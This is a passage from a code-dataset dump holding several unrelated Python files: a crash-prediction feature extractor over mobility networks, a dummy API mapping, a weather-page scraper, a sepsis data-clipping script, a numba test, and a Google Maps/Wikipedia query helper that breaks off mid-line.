defaultdict(list)\n l1l3_events = defaultdict(list)\n l3l1_events = defaultdict(list)\n l2l3_events = defaultdict(list)\n l3l2_events = defaultdict(list)\n\n mov_event_entropy = defaultdict(list)\n\n for m0m1, imn in imn_list.items():\n if imn is None:\n continue\n # print(m0m1, imn.keys())\n # print(json.dumps(clear_tuples4json(imn), default=agenda_converter))\n nbr_locations.append(imn['n_locs'])\n nbr_movements.append(imn['n_movs'])\n nbr_reg_locations.append(imn['n_reg_locs'])\n nbr_reg_movements.append(imn['n_reg_movs'])\n radius_of_gyration.append(imn['rg'])\n regular_radius_of_gyration.append(imn['rrg'])\n entropy.append(imn['entropy'])\n rentropy.append(imn['rentropy'])\n avg_mov_length.append(imn['avg_mov_length'])\n std_mov_length.append(imn['std_mov_length'])\n avg_mov_duration.append(string2timedelta(imn['avg_mov_duration']).total_seconds())\n std_mov_duration.append(string2timedelta(imn['std_mov_duration']).total_seconds())\n avg_reg_mov_length.append(imn['avg_reg_mov_length'])\n std_reg_mov_length.append(imn['std_reg_mov_length'])\n 
avg_reg_mov_duration.append(string2timedelta(imn['avg_reg_mov_duration']).total_seconds())\n std_reg_mov_duration.append(string2timedelta(imn['std_reg_mov_duration']).total_seconds())\n\n graph = imn['graph']\n if not isinstance(graph, nx.DiGraph):\n graph = json_graph.node_link_graph(imn['graph'], directed=True, multigraph=False,\n attrs={'link': 'edges', 'source': 'from', 'target': 'to'})\n density.append(nx.density(graph))\n triangles.append(np.mean(list(nx.triangles(nx.to_undirected(graph)).values())))\n clustering_coefficient.append(nx.average_clustering(graph))\n degree.append(np.mean(list(dict(nx.to_undirected(graph).degree()).values())))\n indegree.append(np.mean(list(dict(graph.in_degree()).values())))\n outdegree.append(np.mean(list(dict(graph.out_degree()).values())))\n if nx.is_connected(nx.to_undirected(graph)):\n diameter.append(nx.diameter(nx.to_undirected(graph)))\n eccentricity.append(np.mean(list(nx.eccentricity(nx.to_undirected(graph)).values())))\n assortativity.append(nx.degree_assortativity_coefficient(nx.to_undirected(graph)))\n else:\n Gc = max(nx.connected_component_subgraphs(nx.to_undirected(graph)), key=len)\n diameter.append(nx.diameter(Gc))\n eccentricity.append(np.mean(list(nx.eccentricity(Gc).values())))\n assortativity.append(nx.degree_assortativity_coefficient(Gc))\n\n # print(imn['location_features'].keys())\n # print(list(imn['location_features'].keys())[0], type(list(imn['location_features'].keys())[0]))\n if isinstance(list(imn['location_features'].keys())[0], int):\n l1, l2, l3 = 0, 1, 2\n else:\n l1, l2, l3 = '0', '1', '2'\n\n l1_count.append(imn['location_features'][l1]['loc_support'])\n l2_count.append(imn['location_features'][l2]['loc_support'])\n if l3 in imn['location_features']:\n l3_count.append(imn['location_features'][l3]['loc_support'])\n in_degree = dict(graph.in_degree())\n out_degree = dict(graph.out_degree())\n dcentrality = nx.degree_centrality(graph)\n bcentrality = nx.betweenness_centrality(graph)\n l1_indegree.append(in_degree[0])\n l2_indegree.append(in_degree[1])\n if 2 in in_degree:\n l3_indegree.append(in_degree[2])\n l1_outdegree.append(out_degree[0])\n l2_outdegree.append(out_degree[1])\n if 2 in out_degree:\n l3_outdegree.append(out_degree[2])\n l1_dcentrality.append(dcentrality[0])\n l2_dcentrality.append(dcentrality[1])\n if 2 in dcentrality:\n l3_dcentrality.append(dcentrality[2])\n l1_bcentrality.append(bcentrality[0])\n l2_bcentrality.append(bcentrality[1])\n if 2 in bcentrality:\n l3_bcentrality.append(bcentrality[2])\n\n l1_nbr_events_type = defaultdict(int)\n l2_nbr_events_type = defaultdict(int)\n l3_nbr_events_type = defaultdict(int)\n\n l1l2_nbr_events_type = defaultdict(int)\n l2l1_nbr_events_type = defaultdict(int)\n l1l3_nbr_events_type = defaultdict(int)\n l3l1_nbr_events_type = defaultdict(int)\n l2l3_nbr_events_type = defaultdict(int)\n l3l2_nbr_events_type = defaultdict(int)\n\n mov_event_count = defaultdict(lambda: defaultdict(int))\n\n for tid in imn['traj_location_from_to']:\n for evnt in event_traj2evntlist[tid]:\n if imn['traj_location_from_to'][tid][1] == 0:\n l1_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][1] == 1:\n l2_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][1] == 2:\n l3_nbr_events_type[evnt['event_type']] += 1\n\n if imn['traj_location_from_to'][tid][0] == 0 and imn['traj_location_from_to'][tid][1] == 1:\n l1l2_nbr_events_type[evnt['event_type']] += 1\n elif imn['traj_location_from_to'][tid][0] == 1 and 
imn['traj_location_from_to'][tid][1] == 0:\n                    l2l1_nbr_events_type[evnt['event_type']] += 1\n                elif imn['traj_location_from_to'][tid][0] == 0 and imn['traj_location_from_to'][tid][1] == 2:\n                    l1l3_nbr_events_type[evnt['event_type']] += 1\n                elif imn['traj_location_from_to'][tid][0] == 2 and imn['traj_location_from_to'][tid][1] == 0:\n                    l3l1_nbr_events_type[evnt['event_type']] += 1\n                elif imn['traj_location_from_to'][tid][0] == 1 and imn['traj_location_from_to'][tid][1] == 2:\n                    l2l3_nbr_events_type[evnt['event_type']] += 1\n                elif imn['traj_location_from_to'][tid][0] == 2 and imn['traj_location_from_to'][tid][1] == 1:\n                    l3l2_nbr_events_type[evnt['event_type']] += 1\n\n                lft = imn['traj_location_from_to'][tid][1]\n                mov_event_count[evnt['event_type']][lft] += 1\n\n        for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n            if event_type in l1_nbr_events_type:\n                l1_events[event_type].append(l1_nbr_events_type[event_type])\n            else:\n                l1_events[event_type].append(0)\n            if event_type in l2_nbr_events_type:\n                l2_events[event_type].append(l2_nbr_events_type[event_type])\n            else:\n                l2_events[event_type].append(0)\n            if event_type in l3_nbr_events_type:\n                l3_events[event_type].append(l3_nbr_events_type[event_type])\n            else:\n                l3_events[event_type].append(0)\n\n            if event_type in l1l2_nbr_events_type:\n                l1l2_events[event_type].append(l1l2_nbr_events_type[event_type])\n            else:\n                l1l2_events[event_type].append(0)\n            if event_type in l2l1_nbr_events_type:\n                l2l1_events[event_type].append(l2l1_nbr_events_type[event_type])\n            else:\n                l2l1_events[event_type].append(0)\n\n            if event_type in l1l3_nbr_events_type:\n                l1l3_events[event_type].append(l1l3_nbr_events_type[event_type])\n            else:\n                l1l3_events[event_type].append(0)\n            if event_type in l3l1_nbr_events_type:\n                l3l1_events[event_type].append(l3l1_nbr_events_type[event_type])\n            else:\n                l3l1_events[event_type].append(0)\n\n            if event_type in l2l3_nbr_events_type:\n                l2l3_events[event_type].append(l2l3_nbr_events_type[event_type])\n            else:\n                l2l3_events[event_type].append(0)\n            if event_type in l3l2_nbr_events_type:\n                l3l2_events[event_type].append(l3l2_nbr_events_type[event_type])\n            else:\n                l3l2_events[event_type].append(0)\n\n            if event_type in mov_event_count:\n                vals = list(mov_event_count[event_type].values())\n                mov_event_entropy[event_type].append(calculate_entropy(vals, classes=len(vals)))\n            else:\n                mov_event_entropy[event_type].append(0.0)\n\n        l1l2_count.append(imn['location_nextlocs'][l1].get(l2, 0))\n        l2l1_count.append(imn['location_nextlocs'][l2].get(l1, 0))\n        l1l3_count.append(imn['location_nextlocs'][l1].get(l3, 0))\n        if '2' in imn['location_nextlocs']:\n            l3l1_count.append(imn['location_nextlocs'][l3].get(l1, 0))\n            l2l3_count.append(imn['location_nextlocs'][l2].get(l3, 0))\n            l3l2_count.append(imn['location_nextlocs'][l3].get(l2, 0))\n        else:\n            l3l1_count.append(0)\n            l2l3_count.append(0)\n            l3l2_count.append(0)\n        edge_betweenness = nx.edge_betweenness(graph)\n        l1l2_betweenness.append(edge_betweenness.get((0, 1), 0))\n        l2l1_betweenness.append(edge_betweenness.get((1, 0), 0))\n        l1l3_betweenness.append(edge_betweenness.get((0, 2), 0))\n        l3l1_betweenness.append(edge_betweenness.get((2, 0), 0))\n        l2l3_betweenness.append(edge_betweenness.get((1, 2), 0))\n        l3l2_betweenness.append(edge_betweenness.get((2, 1), 0))\n\n    imn_temporal_features = get_imn_temporal_features(imn_list)\n\n    features = {\n        'nbr_locations': np.mean(nbr_locations),\n        'nbr_movements': np.mean(nbr_movements),\n        'nbr_reg_locations': np.mean(nbr_reg_locations),\n        'nbr_reg_movements': np.mean(nbr_reg_movements),\n        
'radius_of_gyration': np.mean(radius_of_gyration),\n 'regular_radius_of_gyration': np.mean(regular_radius_of_gyration),\n 'entropy': np.mean(entropy),\n 'rentropy': np.mean(rentropy),\n 'avg_mov_length': np.mean(avg_mov_length),\n 'std_mov_length': np.mean(std_mov_length),\n 'avg_mov_duration': np.mean(avg_mov_duration),\n 'std_mov_duration': np.mean(std_mov_duration),\n # 'avg_reg_mov_length': np.mean(avg_reg_mov_length),\n # 'std_reg_mov_length': np.mean(std_reg_mov_length),\n 'avg_reg_mov_duration': np.mean(avg_reg_mov_duration),\n 'std_reg_mov_duration': np.mean(std_reg_mov_duration),\n\n 'density': np.mean(density),\n 'triangles': np.mean(triangles),\n 'clustering_coefficient': np.mean(clustering_coefficient),\n 'avg_degree': np.mean(degree),\n 'avg_indegree': np.mean(indegree),\n 'avg_outdegree': np.mean(outdegree),\n 'diameter': np.mean(diameter),\n 'eccentricity': np.mean(eccentricity),\n 'assortativity': np.mean(assortativity),\n\n 'l1_count': np.mean(l1_count),\n 'l2_count': np.mean(l2_count),\n 'l3_count': np.mean(l3_count),\n 'l1_indegree': np.mean(l1_indegree),\n 'l2_indegree': np.mean(l2_indegree),\n 'l3_indegree': np.mean(l3_indegree),\n 'l1_outdegree': np.mean(l1_outdegree),\n 'l2_outdegree': np.mean(l2_outdegree),\n 'l3_outdegree': np.mean(l3_outdegree),\n 'l1_dcentrality': np.mean(l1_dcentrality),\n 'l2_dcentrality': np.mean(l2_dcentrality),\n 'l3_dcentrality': np.mean(l3_dcentrality),\n 'l1_bcentrality': np.mean(l1_bcentrality),\n 'l2_bcentrality': np.mean(l2_bcentrality),\n 'l3_bcentrality': np.mean(l3_bcentrality),\n\n 'l1l2_count': np.mean(l1l2_count),\n 'l2l1_count': np.mean(l2l1_count),\n 'l1l3_count': np.mean(l1l3_count),\n 'l3l1_count': np.mean(l3l1_count),\n 'l2l3_count': np.mean(l2l3_count),\n 'l3l2_count': np.mean(l3l2_count),\n 'l1l2_betweenness': np.mean(l1l2_betweenness),\n 'l2l1_betweenness': np.mean(l2l1_betweenness),\n 'l1l3_betweenness': np.mean(l1l3_betweenness),\n 'l3l1_betweenness': np.mean(l3l1_betweenness),\n 'l2l3_betweenness': np.mean(l2l3_betweenness),\n 'l3l2_betweenness': np.mean(l3l2_betweenness),\n }\n\n features.update(imn_temporal_features)\n\n for event_type in ['Q', 'B', 'A', 'C', 'stop', 'start']:\n features['l1_%s' % event_type] = np.mean(l1_events[event_type])\n features['l2_%s' % event_type] = np.mean(l2_events[event_type])\n features['l3_%s' % event_type] = np.mean(l3_events[event_type])\n features['l1l2_%s' % event_type] = np.mean(l1l2_events[event_type])\n features['l2l1_%s' % event_type] = np.mean(l2l1_events[event_type])\n features['l1l3_%s' % event_type] = np.mean(l1l3_events[event_type])\n features['l3l1_%s' % event_type] = np.mean(l3l1_events[event_type])\n features['l2l3_%s' % event_type] = np.mean(l2l3_events[event_type])\n features['l3l2_%s' % event_type] = np.mean(l3l2_events[event_type])\n features['mov_entropy_%s' % event_type] = np.mean(mov_event_entropy[event_type])\n\n for k, v in features.items():\n if np.isnan(v):\n features[k] = -1\n\n return features\n\n\ndef path_in_tree(tree, path, max_depth=16):\n idx = 0\n node = tree\n while True:\n if node['is_leaf'] or idx == len(path) or (max_depth is not None and node['depth'] >= max_depth):\n break\n code = path[idx]\n # print(idx, code)\n if code not in node:\n # print('path not found')\n break\n node = node[code]\n idx += 1\n\n return path[:idx]\n\n\ndef get_collective_features(trajectories, imn_list, quadtree, quadtree_features):\n\n features_path_count = defaultdict(int)\n for traj in trajectories.values():\n paths_of_this_traj = set()\n for i, point in 
enumerate(traj.object):\n lon, lat, _ = point\n path = lon_lat_to_quadtree_path(lon, lat, depth=16)\n if path not in paths_of_this_traj:\n features_path_count[path] += 1\n paths_of_this_traj.add(path)\n\n is_regular_path = {path: False for path in features_path_count}\n for m0m1, imn in imn_list.items():\n if imn is None:\n continue\n if len(imn['regular_locations']) > 0:\n for lid in imn['regular_locations']:\n if isinstance(list(imn['location_prototype'].keys())[0], str):\n lid = str(lid)\n lon, lat = imn['location_prototype'][lid]\n path = lon_lat_to_quadtree_path(lon, lat, depth=16)\n is_regular_path[path] = True\n\n for mid, movement_traj in imn['movement_traj'].items():\n lft = movement_traj[0]\n if lft[0] in imn['regular_locations'] and lft[1] in imn['regular_locations']:\n if isinstance(imn['movement_prototype'][mid], dict):\n traj_object = imn['movement_prototype'][mid]['object']\n else:\n traj_object = imn['movement_prototype'][mid].object\n for i, point in enumerate(traj_object):\n lon, lat, _ = point\n path = lon_lat_to_quadtree_path(lon, lat, depth=16)\n is_regular_path[path] = True\n\n aggregated_quadtree_features_reg = dict()\n aggregated_quadtree_features_irrreg = dict()\n aggregated_quadtree_features_reg_count = dict()\n aggregated_quadtree_features_irrreg_count = dict()\n for path in features_path_count:\n if path not in quadtree_features:\n continue\n apath = path_in_tree(quadtree, path, max_depth=16)\n if is_regular_path[path]:\n if apath not in aggregated_quadtree_features_reg:\n aggregated_quadtree_features_reg[apath] = quadtree_features[path]\n aggregated_quadtree_features_reg_count[apath] = features_path_count[path]\n else:\n for k, v in quadtree_features[path].items():\n aggregated_quadtree_features_reg[apath][k] += v\n aggregated_quadtree_features_reg_count[apath] += features_path_count[path]\n else:\n if apath not in aggregated_quadtree_features_irrreg:\n aggregated_quadtree_features_irrreg[apath] = quadtree_features[path]\n aggregated_quadtree_features_irrreg_count[apath] = features_path_count[path]\n else:\n for k, v in quadtree_features[path].items():\n aggregated_quadtree_features_irrreg[apath][k] += v\n aggregated_quadtree_features_irrreg_count[apath] += features_path_count[path]\n\n aggregated_quadtree_features_reg_comb = dict()\n aggregated_quadtree_features_irrreg_comb = dict()\n for aqf, aqfc in zip([aggregated_quadtree_features_reg, aggregated_quadtree_features_irrreg],\n [aggregated_quadtree_features_reg_comb, aggregated_quadtree_features_irrreg_comb]):\n for path in aqf:\n aqfc[path] = {\n 'nbr_traj_start': aqf[path]['nbr_traj_start'],\n 'nbr_traj_stop': aqf[path]['nbr_traj_stop'],\n 'nbr_traj_move': aqf[path]['nbr_traj_move'],\n 'avg_traj_speed': aqf[path]['traj_speed_count'] / aqf[path]['traj_speed_count']\n if aqf[path]['traj_speed_count'] > 0 else 0,\n 'nbr_evnt_A': aqf[path]['nbr_evnt_A'],\n 'nbr_evnt_B': aqf[path]['nbr_evnt_B'],\n 'nbr_evnt_C': aqf[path]['nbr_evnt_C'],\n 'nbr_evnt_Q': aqf[path]['nbr_evnt_Q'],\n 'nbr_evnt_start': aqf[path]['nbr_evnt_start'],\n 'nbr_evnt_stop': aqf[path]['nbr_evnt_stop'],\n 'avg_speed_A': aqf[path]['speed_A_sum'] / aqf[path]['nbr_evnt_A'] if aqf[path]['nbr_evnt_A'] > 0 else 0,\n 'avg_max_acc_A': aqf[path]['max_acc_A_sum'] / aqf[path]['nbr_evnt_A'] if aqf[path]['nbr_evnt_A'] > 0 else 0,\n 'avg_avg_acc_A': aqf[path]['avg_acc_A_sum'] / aqf[path]['nbr_evnt_A'] if aqf[path]['nbr_evnt_A'] > 0 else 0,\n 'avg_speed_B': aqf[path]['speed_B_sum'] / aqf[path]['nbr_evnt_B'] if aqf[path]['nbr_evnt_B'] > 0 else 0,\n 
'avg_max_acc_B': aqf[path]['max_acc_B_sum'] / aqf[path]['nbr_evnt_B'] if aqf[path]['nbr_evnt_B'] > 0 else 0,\n 'avg_avg_acc_B': aqf[path]['avg_acc_B_sum'] / aqf[path]['nbr_evnt_B'] if aqf[path]['nbr_evnt_B'] > 0 else 0,\n 'avg_speed_C': aqf[path]['speed_C_sum'] / aqf[path]['nbr_evnt_C'] if aqf[path]['nbr_evnt_C'] > 0 else 0,\n 'avg_max_acc_C': aqf[path]['max_acc_C_sum'] / aqf[path]['nbr_evnt_C'] if aqf[path]['nbr_evnt_C'] > 0 else 0,\n 'avg_avg_acc_C': aqf[path]['avg_acc_C_sum'] / aqf[path]['nbr_evnt_C'] if aqf[path]['nbr_evnt_C'] > 0 else 0,\n 'avg_speed_Q': aqf[path]['speed_Q_sum'] / aqf[path]['nbr_evnt_Q'] if aqf[path]['nbr_evnt_Q'] > 0 else 0,\n 'avg_max_acc_Q': aqf[path]['max_acc_Q_sum'] / aqf[path]['nbr_evnt_Q'] if aqf[path]['nbr_evnt_Q'] > 0 else 0,\n 'avg_avg_acc_Q': aqf[path]['avg_acc_Q_sum'] / aqf[path]['nbr_evnt_Q'] if aqf[path]['nbr_evnt_Q'] > 0 else 0,\n 'nbr_crash': aqf[path]['nbr_crash'],\n }\n aggregated_quadtree_features_reg = aggregated_quadtree_features_reg_comb\n aggregated_quadtree_features_irrreg = aggregated_quadtree_features_irrreg_comb\n\n features = defaultdict(float)\n total_reg = np.sum(list(aggregated_quadtree_features_reg_count.values()))\n for path, values in aggregated_quadtree_features_reg.items():\n count = aggregated_quadtree_features_reg_count[path]\n for k, v in values.items():\n if total_reg > 0:\n features['reg_%s' % k] += v * count / total_reg\n else:\n features['reg_%s' % k] += 0\n total_occ = np.sum(list(aggregated_quadtree_features_irrreg_count.values()))\n for path, values in aggregated_quadtree_features_irrreg.items():\n count = aggregated_quadtree_features_irrreg_count[path]\n for k, v in values.items():\n if total_occ > 0:\n features['occ_%s' % k] += v * count / total_occ\n else:\n features['occ_%s' % k] += 0\n\n return features\n\n\ndef extract_features_data(uid, data, quadtree, quadtree_features):\n\n features = dict()\n for index, values in data.items():\n trajectories = values['trajectories']\n events = values['events']\n imn_list = values['imns']\n event_traj2evntlist = defaultdict(list)\n for eid, evnt in events.items():\n event_traj2evntlist[evnt['tid']].append(evnt)\n\n if len(trajectories) == 0:\n continue\n\n traj_features = get_trjectory_features(trajectories)\n evnt_features = get_events_features(events)\n imn_features = get_imn_features(imn_list, event_traj2evntlist)\n collective_features = get_collective_features(trajectories, imn_list, quadtree, quadtree_features[index])\n\n features[index] = {\n 'uid': uid,\n 'crash': values['crash'],\n }\n\n features[index].update(traj_features)\n features[index].update(evnt_features)\n features[index].update(imn_features)\n features[index].update(collective_features)\n\n return features\n\n\ndef extract_features(uid, tr_data, ts_data, quadtree, tr_quadtree_features, ts_quadtree_features):\n # print('train')\n training = extract_features_data(uid, tr_data, quadtree, tr_quadtree_features)\n # print('test')\n test = extract_features_data(uid, ts_data, quadtree, ts_quadtree_features)\n return training, test\n\n\ndef store_features(filename, store_obj):\n json_str = '%s\\n' % json.dumps(store_obj, cls=NumpyEncoder)\n json_bytes = json_str.encode('utf-8')\n # print(json_str)\n with gzip.GzipFile(filename, 'a') as fout:\n fout.write(json_bytes)\n\n\n# def main():\n# area = sys.argv[1]\n# country = 'uk' if area == 'london' else 'italy'\n#\n# path = './'\n# path_dataset = path + 'dataset/'\n# path_imn = path + 'imn/'\n# path_crash = path + 'crash/'\n#\n# crash_users_filename = path_dataset + 
'%s_users_list.csv' % area\n# nocrash_users_filename = path_dataset + '%s_nocrash_users_list.csv' % area\n#\n# crash_users_list = sorted(pd.read_csv(crash_users_filename).values[:, 0].tolist())\n# nocrash_users_list = sorted(pd.read_csv(nocrash_users_filename).values[:, 0].tolist())\n#\n#\n#\n# if __name__ == \"__main__\":\n# main()\n","sub_path":"code/feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":44140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"25435205","text":"API_MAPPINGS = {\n\n \"dummy_get\": {\n \"params\": ['p1', 'p2'],\n \"API_method\": ['GET'],\n \"third_party_url\": \"http://0.0.0.0:8080/test_get1\",\n \"output_format\": \"JSON\"\n },\n\n \"dummy_post\": {\n \"params\": [\"p1\", \"p2\"],\n \"API_method\": ['POST'],\n \"third_party_url\": \"http://0.0.0.0:8080/test_post1\",\n \"output_format\": \"JSON\",\n }\n\n}\n","sub_path":"Non Unified URLs/Architecture_one/app/v2/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"312382294","text":"# I decided to beat the exercise from the workbook!\n\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\npage = requests.get(\"https://forecast.weather.gov/MapClick.php?lat=37.777120000000025&lon=-122.41963999999996#.X9DVpBakolQ\")\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# first filtering we do over
 because it suits our needs\nall_data = soup.findAll('div', class_=\"tombstone-container\")\n\n# lists for storage\nperiod_names = []\nshort_descriptions = []\ntemperatures = []\n\n# fill them with data :)\nfor data in all_data:\n    period_names.append(data.find('p', class_='period-name').get_text(separator=' '))\n    short_descriptions.append(data.find('p', class_='short-desc').get_text(separator=' ')) \n    temperatures.append(data.find('p', class_='temp').get_text())\n\n# let's zip them into tuples!\ndata_tuples = zip(period_names, short_descriptions, temperatures)\n\n# and create a nice data frame :)\nweather_data = pd.DataFrame(data_tuples, columns=['period-name', 'short-desc', 'temp'])\n\n\n#################################\n# and with dedication for Wojtek:\ndef to_celsius(fahrenheit):\n    i_fahr = int(fahrenheit)\n    d_cels = round((i_fahr - 32) * 5/9, 1)\n    return str(d_cels)\n\n\ntemperatures_c = []\nfor t in temperatures:\n    t_splitted = t.split()\n    t_splitted[1] = to_celsius(t_splitted[1])\n    t_splitted[2] = t_splitted[2].replace('F', 'C')\n    t_joined = \" \".join(t_splitted)\n    temperatures_c.append(t_joined)\n\ndata_tuples = zip(period_names, short_descriptions, temperatures_c)\nweather_data_c = pd.DataFrame(data_tuples, columns=['period-name', 'short-desc', 'temp'])\n\n\nprint(weather_data)\nprint()\nprint(weather_data_c)","sub_path":"1. Python/06. Pandas/ex1_cell17_v3 (2).py","file_name":"ex1_cell17_v3 (2).py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180032241","text":"import numpy as np, pandas as pd\r\nimport os\r\nimport csv\r\n\r\ndir_str= r'E:\Python\PycharmProjects\MScProject\TrainingA_Sepsis0-1.csv'\r\n\r\ncsv1 = pd.read_csv(dir_str)\r\ncsv1.drop(\"DBP\",axis=1,inplace=True)\r\n\r\ncsv1[\"HR\"] = np.where(csv1[\"HR\"] >= 200, 200, csv1[\"HR\"])\r\ncsv1[\"HR\"] = np.where(csv1[\"HR\"] <= 30, 30, csv1[\"HR\"])\r\n\r\ncsv1[\"Temp\"] = np.where(csv1[\"Temp\"] >= 42, 42, csv1[\"Temp\"])\r\ncsv1[\"Temp\"] = np.where(csv1[\"Temp\"] <= 35, 35, csv1[\"Temp\"])\r\n\r\ncsv1[\"O2Sat\"] = np.where(csv1[\"O2Sat\"] <= 70, 70, csv1[\"O2Sat\"])\r\n\r\ncsv1[\"SBP\"] = np.where(csv1[\"SBP\"] <= 80, 80, csv1[\"SBP\"])\r\n\r\ncsv1[\"Resp\"] = np.where(csv1[\"Resp\"] <= 10, 10, csv1[\"Resp\"])\r\ncsv1[\"Resp\"] = np.where(csv1[\"Resp\"] >= 24, 24, csv1[\"Resp\"])\r\n\r\nform = \"{0:.02f}\".format\r\n\r\ncsv1 = csv1.applymap(form)\r\n\r\n\r\ncsv1.to_csv('A.csv',index=False) # index=False means the row index is not written\r\n","sub_path":"TrainingA_sepsis0-1_Continue.py","file_name":"TrainingA_sepsis0-1_Continue.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"437916748","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function, division, absolute_import\n\nimport numpy as np\nfrom numba import autojit\n\n@autojit\ndef slicing_error(X, window_size, i):\n    return X[max(0, i - window_size):i + 1]\n\ndef test_slicing_shape():\n\n    X = np.random.normal(0, 1, (20, 2))\n\n    i = 0\n    gold = slicing_error.py_func(X, 10, i)\n    ans = slicing_error(X, 10, i)\n\n    assert gold.shape == ans.shape, (gold.shape, ans.shape)\n\nif __name__ == '__main__':\n    test_slicing_shape()\n","sub_path":"oldnumba/tests/issues/test_issue_77.py","file_name":"test_issue_77.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"529262203","text":"# coding: 
utf-8\nimport re\nimport googlemaps\nimport wikipedia\n\n\"\"\" Parser class in charge of parse string in\nlist of words \"\"\"\nclass Parser:\n\n\tdef __init__(self, search, stopwords):\n\t\tself.user_search_list = []\n\t\tself.user_search = search\n\t\tself.stopwords = set(stopwords)\n\n\t\"\"\" Get the string type by the user, lowered it,\n\tthen substract all special character from it and replace\n\tit by ' ', split it by ' '. Then we remove from the list\n\tall the empty string '' to have only words. We compare this list\n\twith the stopwords list and return the difference \"\"\"\n\t@property\n\tdef parsing_words(self):\n\t\tself.user_search = self.user_search.lower()\n\t\tself.user_search_list = re.sub(\n\t\t\tr'\\W+', ' ', self.user_search)\n\t\tself.user_search_list = self.user_search_list.split(' ')\n\t\tfor i, value in enumerate(\n\t\t\tself.user_search_list):\n\t\t\tif value == '':\n\t\t\t\tdel self.user_search_list[i]\n\t\tparsing = [x for x in self.user_search_list if x not in self.stopwords]\n\t\treturn parsing\n\n\"\"\" Gmap class in charge of getting and retrun googlemaps\nand wikipedia API value \"\"\"\nclass Gmap:\n\n\tdef __init__(self, user_query, gm_api_id):\n\t\tself.user_query = user_query\n\t\tself.request = \"\"\n\t\tself.gmap = googlemaps.Client(\n\t\t\tkey=gm_api_id)\n\n\t\"\"\" This method return the value from the googlemap API\n\tand wikipedia API to the /_get_user_value route \"\"\"\n\tdef gmaps_main(self):\n\t\tif not self.request:\n\t\t\tself.user_query2str()\n\t\tif self.request:\n\t\t\twiki = (False, False)\n\t\t\tname = []\n\t\t\tcoordinates = []\n\t\t\taddress = False\n\t\t\t\"\"\" Get the geocode of Paris to have a \n\t\t\tposition for the places google map request \"\"\"\n\t\t\tgeocode = self.request_geocode(\"Paris\")\n\t\t\tif geocode:\n\t\t\t\t\"\"\" If we have a geocode back, get the places\n\t\t\t\tfrom google map service \"\"\"\n\t\t\t\tplaces = self.request_places(self.request, \n\t\t\t\t\t\t\tlocation=geocode)\n\t\t\t\tif places:\n\t\t\t\t\t\"\"\" If we have place, the ask the wikipedia API\n\t\t\t\t\tto search with the place name found by google.\n\t\t\t\t\tThen take the name and these coordinates \"\"\"\n\t\t\t\t\twiki = self.request_wiki(places[0].keys())\n\t\t\t\t\tfor place in places:\n\t\t\t\t\t\tfor key, value in place.items():\n\t\t\t\t\t\t\tname.append(key)\n\t\t\t\t\t\t\tcoordinates.append(value)\n\t\t\t\t\tif coordinates:\n\t\t\t\t\t\t\"\"\" If we get coordinates, get the address of the\n\t\t\t\t\t\tplace by using reverse geocode google map service with\n\t\t\t\t\t\tplaces coordinates found before \"\"\"\n\t\t\t\t\t\treverse_geocode = self.gmap.reverse_geocode(coordinates[0])\n\t\t\t\t\t\tif reverse_geocode:\n\t\t\t\t\t\t\taddress = reverse_geocode[0][\"formatted_address\"]\n\t\t\treturn name, coordinates, wiki, address\n\t\telse:\n\t\t\treturn False, False, (False, False), False\n\n\t\"\"\" This method get a list and return a string\n\tto be used with Gmaps and Wikipedia API\"\"\"\n\tdef user_query2str(self):\n\t\tif self.user_query:\n\t\t\tfor i, place in enumerate(self.user_query):\n\t\t\t\tif i < len(self.user_query) - 1:\n\t\t\t\t\tself.request += place + \" \"\n\t\t\t\telse:\n\t\t\t\t\tself.request += place\n\n\t\"\"\" This method send to the Gmaps API\n\ta geocode request and return coordinates\n\tto the gmaps_main method to be use as\n\tlocation argument for the request_places\n\tmethod \"\"\"\n\tdef request_geocode(self, request):\n\t\tgeocode = self.gmap.geocode(\n\t\t\trequest, language=\"fr\")\n\t\tif 
\n\t\tif geocode:\n\t\t\tgeometry = geocode[0]['geometry']\n\t\t\tlocation = geometry['location']\n\t\t\treturn location\n\t\telse:\n\t\t\treturn False\n\n\t\"\"\" This method sends to the Gmaps API a places\n\trequest and returns a dictionary to the gmaps_main\n\tmethod \"\"\"\n\tdef request_places(self, request, location):\n\t\tlocation_list = []\n\t\ttry:\n\t\t\tplaces = self.gmap.places(\n\t\t\t\trequest, location=location,\n\t\t\t\tradius=5000)\n\t\texcept Exception as err:\n\t\t\tprint(err)\n\t\t\treturn False\n\t\tif places['status'] == \"OK\":\n\t\t\tfor place in places['results']:\n\t\t\t\tplaces_dictionary = {}\n\t\t\t\tname = place['name']\n\t\t\t\tgeometry = place['geometry']\n\t\t\t\tlocation = geometry['location']\n\t\t\t\tplaces_dictionary[name] = location\n\t\t\t\tlocation_list.append(places_dictionary)\n\t\t\treturn location_list\n\t\telse:\n\t\t\treturn False\n\n\t\"\"\" This method sends to the Wikipedia API\n\ta request with the name extracted from the\n\tdictionary returned by the places request.\n\tIf there are many results, we take the first\n\tresult in the queue, then we get the summary\n\tand the HTTP address of the page, which are returned\n\tto the gmaps_main method \"\"\"\n\tdef request_wiki(self, request):\n\t\twikipedia.set_lang(\"fr\")\n\t\ttry:\n\t\t\twiki_search = wikipedia.search(request)\n\t\texcept wikipedia.exceptions.DisambiguationError as e:\n\t\t\t# keep the whole options list so wiki_search[0] below is a page title\n\t\t\twiki_search = e.options\n\t\tif wiki_search:\n\t\t\tname = wiki_search[0]\n\t\t\twiki_summary = wikipedia.summary(name)\n\t\t\twiki_page = wikipedia.page(name)\n\t\t\ttry:\n\t\t\t\twiki_url = 